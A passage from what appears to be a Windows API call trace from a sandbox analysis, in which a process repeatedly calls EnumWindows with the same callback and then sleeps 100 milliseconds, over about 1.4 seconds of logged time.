(lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.572] Sleep (dwMilliseconds=0x64) [0133.574] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.574] Sleep (dwMilliseconds=0x64) [0133.575] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.586] Sleep (dwMilliseconds=0x64) [0133.588] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.588] Sleep (dwMilliseconds=0x64) [0133.589] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.589] Sleep (dwMilliseconds=0x64) [0133.592] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.592] Sleep (dwMilliseconds=0x64) [0133.593] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.594] Sleep (dwMilliseconds=0x64) [0133.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.595] Sleep (dwMilliseconds=0x64) [0133.596] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.597] Sleep (dwMilliseconds=0x64) [0133.598] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.598] Sleep (dwMilliseconds=0x64) [0133.600] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.600] Sleep (dwMilliseconds=0x64) [0133.602] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.602] Sleep (dwMilliseconds=0x64) [0133.603] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.603] Sleep (dwMilliseconds=0x64) [0133.605] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.605] Sleep (dwMilliseconds=0x64) [0133.606] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.607] Sleep (dwMilliseconds=0x64) [0133.608] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.608] Sleep (dwMilliseconds=0x64) [0133.609] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.609] Sleep (dwMilliseconds=0x64) [0133.611] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.611] Sleep (dwMilliseconds=0x64) [0133.612] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.612] Sleep (dwMilliseconds=0x64) [0133.615] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.615] Sleep (dwMilliseconds=0x64) [0133.617] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.617] Sleep (dwMilliseconds=0x64) [0133.618] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.618] Sleep (dwMilliseconds=0x64) [0133.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.620] Sleep (dwMilliseconds=0x64) [0133.621] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.621] Sleep (dwMilliseconds=0x64) [0133.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.623] Sleep (dwMilliseconds=0x64) [0133.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.625] Sleep (dwMilliseconds=0x64) [0133.626] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.627] Sleep (dwMilliseconds=0x64) [0133.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.641] Sleep (dwMilliseconds=0x64) [0133.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.644] Sleep (dwMilliseconds=0x64) [0133.646] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.646] Sleep (dwMilliseconds=0x64) [0133.648] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.648] Sleep (dwMilliseconds=0x64) [0133.649] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.649] Sleep (dwMilliseconds=0x64) [0133.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.651] Sleep (dwMilliseconds=0x64) [0133.652] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.652] Sleep (dwMilliseconds=0x64) [0133.654] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.654] Sleep (dwMilliseconds=0x64) [0133.655] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.655] Sleep (dwMilliseconds=0x64) [0133.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.657] Sleep (dwMilliseconds=0x64) [0133.658] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.659] Sleep (dwMilliseconds=0x64) [0133.660] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.660] Sleep (dwMilliseconds=0x64) [0133.661] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.661] Sleep (dwMilliseconds=0x64) [0133.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.663] Sleep (dwMilliseconds=0x64) [0133.665] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.665] Sleep (dwMilliseconds=0x64) [0133.709] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.709] Sleep (dwMilliseconds=0x64) [0133.834] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.835] Sleep (dwMilliseconds=0x64) [0133.838] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.838] Sleep (dwMilliseconds=0x64) [0133.840] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.840] Sleep (dwMilliseconds=0x64) [0133.841] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.852] Sleep (dwMilliseconds=0x64) [0133.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.854] Sleep (dwMilliseconds=0x64) [0133.855] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.855] Sleep (dwMilliseconds=0x64) [0133.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.857] Sleep (dwMilliseconds=0x64) [0133.858] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.858] Sleep (dwMilliseconds=0x64) [0133.860] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.860] Sleep (dwMilliseconds=0x64) [0133.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.862] Sleep (dwMilliseconds=0x64) [0133.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.863] Sleep (dwMilliseconds=0x64) [0133.865] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.865] Sleep (dwMilliseconds=0x64) [0133.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.867] Sleep (dwMilliseconds=0x64) [0133.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.868] Sleep (dwMilliseconds=0x64) [0133.869] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.870] Sleep (dwMilliseconds=0x64) [0133.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.871] Sleep (dwMilliseconds=0x64) [0133.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.873] Sleep (dwMilliseconds=0x64) [0133.874] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.874] Sleep (dwMilliseconds=0x64) [0133.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.876] Sleep (dwMilliseconds=0x64) [0133.877] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.877] Sleep (dwMilliseconds=0x64) [0133.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.879] Sleep (dwMilliseconds=0x64) [0133.880] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.880] Sleep (dwMilliseconds=0x64) [0133.908] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.908] Sleep (dwMilliseconds=0x64) [0133.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.912] Sleep (dwMilliseconds=0x64) [0133.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.913] Sleep (dwMilliseconds=0x64) [0133.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.915] Sleep (dwMilliseconds=0x64) [0133.917] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.917] Sleep (dwMilliseconds=0x64) [0133.919] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.919] Sleep (dwMilliseconds=0x64) [0133.921] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.921] Sleep (dwMilliseconds=0x64) [0133.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.922] Sleep (dwMilliseconds=0x64) [0133.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.924] Sleep (dwMilliseconds=0x64) [0133.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.925] Sleep (dwMilliseconds=0x64) [0133.927] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.927] Sleep (dwMilliseconds=0x64) [0133.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.928] Sleep (dwMilliseconds=0x64) [0133.930] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.930] Sleep (dwMilliseconds=0x64) [0133.932] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.932] Sleep (dwMilliseconds=0x64) [0133.934] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.934] Sleep (dwMilliseconds=0x64) [0133.935] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.936] Sleep (dwMilliseconds=0x64) [0133.937] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0133.937] Sleep (dwMilliseconds=0x64) [0134.000] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.001] Sleep (dwMilliseconds=0x64) [0134.004] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.004] Sleep (dwMilliseconds=0x64) [0134.006] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.006] Sleep (dwMilliseconds=0x64) [0134.007] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.007] Sleep (dwMilliseconds=0x64) [0134.008] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.009] Sleep (dwMilliseconds=0x64) [0134.010] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.010] Sleep (dwMilliseconds=0x64) [0134.012] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.012] Sleep (dwMilliseconds=0x64) [0134.013] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.013] Sleep (dwMilliseconds=0x64) [0134.014] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.015] Sleep (dwMilliseconds=0x64) [0134.017] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.017] Sleep (dwMilliseconds=0x64) [0134.019] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.019] Sleep (dwMilliseconds=0x64) [0134.021] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.021] Sleep (dwMilliseconds=0x64) [0134.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.022] Sleep (dwMilliseconds=0x64) [0134.024] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.024] Sleep (dwMilliseconds=0x64) [0134.025] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.025] Sleep (dwMilliseconds=0x64) [0134.027] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.027] Sleep (dwMilliseconds=0x64) [0134.028] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.028] Sleep (dwMilliseconds=0x64) [0134.030] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.030] Sleep (dwMilliseconds=0x64) [0134.031] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.031] Sleep (dwMilliseconds=0x64) [0134.033] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.033] Sleep (dwMilliseconds=0x64) [0134.034] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.034] Sleep (dwMilliseconds=0x64) [0134.036] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.037] Sleep (dwMilliseconds=0x64) [0134.039] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.039] Sleep (dwMilliseconds=0x64) [0134.041] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.041] Sleep (dwMilliseconds=0x64) [0134.042] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.042] Sleep (dwMilliseconds=0x64) [0134.044] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.044] Sleep (dwMilliseconds=0x64) [0134.046] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.046] Sleep (dwMilliseconds=0x64) [0134.047] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.047] Sleep (dwMilliseconds=0x64) [0134.049] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.049] Sleep (dwMilliseconds=0x64) [0134.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.050] Sleep (dwMilliseconds=0x64) [0134.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.052] Sleep (dwMilliseconds=0x64) [0134.053] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.053] Sleep (dwMilliseconds=0x64) [0134.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.057] Sleep (dwMilliseconds=0x64) [0134.059] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.059] Sleep (dwMilliseconds=0x64) [0134.060] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.060] Sleep (dwMilliseconds=0x64) [0134.062] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.062] Sleep (dwMilliseconds=0x64) [0134.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.064] Sleep (dwMilliseconds=0x64) [0134.066] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.066] Sleep (dwMilliseconds=0x64) [0134.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.067] Sleep (dwMilliseconds=0x64) [0134.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.069] Sleep (dwMilliseconds=0x64) [0134.070] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.070] Sleep (dwMilliseconds=0x64) [0134.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.078] Sleep (dwMilliseconds=0x64) [0134.080] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.080] Sleep (dwMilliseconds=0x64) [0134.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.081] Sleep (dwMilliseconds=0x64) [0134.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.083] Sleep (dwMilliseconds=0x64) [0134.085] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.085] Sleep (dwMilliseconds=0x64) [0134.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.087] Sleep (dwMilliseconds=0x64) [0134.151] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.151] Sleep (dwMilliseconds=0x64) [0134.153] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.153] Sleep (dwMilliseconds=0x64) [0134.154] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.154] Sleep (dwMilliseconds=0x64) [0134.155] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.156] Sleep (dwMilliseconds=0x64) [0134.157] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.157] Sleep (dwMilliseconds=0x64) [0134.159] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.159] Sleep (dwMilliseconds=0x64) [0134.162] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.163] Sleep (dwMilliseconds=0x64) [0134.164] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.164] Sleep (dwMilliseconds=0x64) [0134.168] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.168] Sleep (dwMilliseconds=0x64) [0134.169] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.170] Sleep (dwMilliseconds=0x64) [0134.171] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.171] Sleep (dwMilliseconds=0x64) [0134.172] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.173] Sleep (dwMilliseconds=0x64) [0134.174] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.174] Sleep (dwMilliseconds=0x64) [0134.175] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.176] Sleep (dwMilliseconds=0x64) [0134.177] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.177] Sleep (dwMilliseconds=0x64) [0134.179] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.179] Sleep (dwMilliseconds=0x64) [0134.180] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.180] Sleep (dwMilliseconds=0x64) [0134.279] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.279] Sleep (dwMilliseconds=0x64) [0134.412] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.413] Sleep (dwMilliseconds=0x64) [0134.480] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.480] Sleep (dwMilliseconds=0x64) [0134.485] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.485] Sleep (dwMilliseconds=0x64) [0134.490] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.490] Sleep (dwMilliseconds=0x64) [0134.491] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.491] Sleep (dwMilliseconds=0x64) [0134.493] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.493] Sleep (dwMilliseconds=0x64) [0134.494] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.494] Sleep (dwMilliseconds=0x64) [0134.500] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.500] Sleep (dwMilliseconds=0x64) [0134.501] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.501] Sleep (dwMilliseconds=0x64) [0134.503] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.503] Sleep (dwMilliseconds=0x64) [0134.504] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.504] Sleep (dwMilliseconds=0x64) [0134.506] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.506] Sleep (dwMilliseconds=0x64) [0134.507] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.507] Sleep (dwMilliseconds=0x64) [0134.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.509] Sleep (dwMilliseconds=0x64) [0134.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.511] Sleep (dwMilliseconds=0x64) [0134.512] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.512] Sleep (dwMilliseconds=0x64) [0134.514] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.514] Sleep (dwMilliseconds=0x64) [0134.515] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.515] Sleep (dwMilliseconds=0x64) [0134.517] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.517] Sleep (dwMilliseconds=0x64) [0134.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.518] Sleep (dwMilliseconds=0x64) [0134.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.520] Sleep (dwMilliseconds=0x64) [0134.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.521] Sleep (dwMilliseconds=0x64) [0134.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.523] Sleep (dwMilliseconds=0x64) [0134.525] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.525] Sleep (dwMilliseconds=0x64) [0134.545] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.545] Sleep (dwMilliseconds=0x64) [0134.547] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.547] Sleep (dwMilliseconds=0x64) [0134.549] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.549] Sleep (dwMilliseconds=0x64) [0134.550] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.550] Sleep (dwMilliseconds=0x64) [0134.557] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.557] Sleep (dwMilliseconds=0x64) [0134.559] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.559] Sleep (dwMilliseconds=0x64) [0134.560] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.561] Sleep (dwMilliseconds=0x64) [0134.595] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.595] Sleep (dwMilliseconds=0x64) [0134.615] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.616] Sleep (dwMilliseconds=0x64) [0134.620] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.620] Sleep (dwMilliseconds=0x64) [0134.622] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.622] Sleep (dwMilliseconds=0x64) [0134.623] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.624] Sleep (dwMilliseconds=0x64) [0134.625] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.625] Sleep (dwMilliseconds=0x64) [0134.627] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.627] Sleep (dwMilliseconds=0x64) [0134.628] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.629] Sleep (dwMilliseconds=0x64) [0134.630] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.631] Sleep (dwMilliseconds=0x64) [0134.632] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.632] Sleep (dwMilliseconds=0x64) [0134.634] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.634] Sleep (dwMilliseconds=0x64) [0134.635] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.636] Sleep (dwMilliseconds=0x64) [0134.637] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.637] Sleep (dwMilliseconds=0x64) [0134.638] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.638] Sleep (dwMilliseconds=0x64) [0134.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.640] Sleep (dwMilliseconds=0x64) [0134.641] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.642] Sleep (dwMilliseconds=0x64) [0134.643] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.643] Sleep (dwMilliseconds=0x64) [0134.644] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.645] Sleep (dwMilliseconds=0x64) [0134.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.650] Sleep (dwMilliseconds=0x64) [0134.773] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.775] Sleep (dwMilliseconds=0x64) [0134.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.777] Sleep (dwMilliseconds=0x64) [0134.778] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.779] Sleep (dwMilliseconds=0x64) [0134.780] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.780] Sleep (dwMilliseconds=0x64) [0134.781] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.782] Sleep (dwMilliseconds=0x64) [0134.783] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.783] Sleep (dwMilliseconds=0x64) [0134.784] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.785] Sleep (dwMilliseconds=0x64) [0134.786] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.786] Sleep (dwMilliseconds=0x64) [0134.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.788] Sleep (dwMilliseconds=0x64) [0134.789] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.789] Sleep (dwMilliseconds=0x64) [0134.815] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.816] Sleep (dwMilliseconds=0x64) [0134.822] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.822] Sleep (dwMilliseconds=0x64) [0134.824] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.824] Sleep (dwMilliseconds=0x64) [0134.826] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.826] Sleep (dwMilliseconds=0x64) [0134.828] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.828] Sleep (dwMilliseconds=0x64) [0134.830] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.830] Sleep (dwMilliseconds=0x64) [0134.832] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.832] Sleep (dwMilliseconds=0x64) [0134.833] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.834] Sleep (dwMilliseconds=0x64) [0134.835] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.835] Sleep (dwMilliseconds=0x64) [0134.836] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.841] Sleep (dwMilliseconds=0x64) [0134.843] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.843] Sleep (dwMilliseconds=0x64) [0134.844] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.845] Sleep (dwMilliseconds=0x64) [0134.846] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.846] Sleep (dwMilliseconds=0x64) [0134.848] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.848] Sleep (dwMilliseconds=0x64) [0134.850] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.850] Sleep (dwMilliseconds=0x64) [0134.851] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.852] Sleep (dwMilliseconds=0x64) [0134.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.853] Sleep (dwMilliseconds=0x64) [0134.854] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.855] Sleep (dwMilliseconds=0x64) [0134.856] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.856] Sleep (dwMilliseconds=0x64) [0134.857] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.858] Sleep (dwMilliseconds=0x64) [0134.859] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.859] Sleep (dwMilliseconds=0x64) [0134.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.861] Sleep (dwMilliseconds=0x64) [0134.862] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.863] Sleep (dwMilliseconds=0x64) [0134.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.864] Sleep (dwMilliseconds=0x64) [0134.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.866] Sleep (dwMilliseconds=0x64) [0134.868] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.868] Sleep (dwMilliseconds=0x64) [0134.869] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.870] Sleep (dwMilliseconds=0x64) [0134.871] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.871] Sleep (dwMilliseconds=0x64) [0134.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.873] Sleep (dwMilliseconds=0x64) [0134.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.960] Sleep (dwMilliseconds=0x64) [0134.962] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.962] Sleep (dwMilliseconds=0x64) [0134.963] EnumWindows 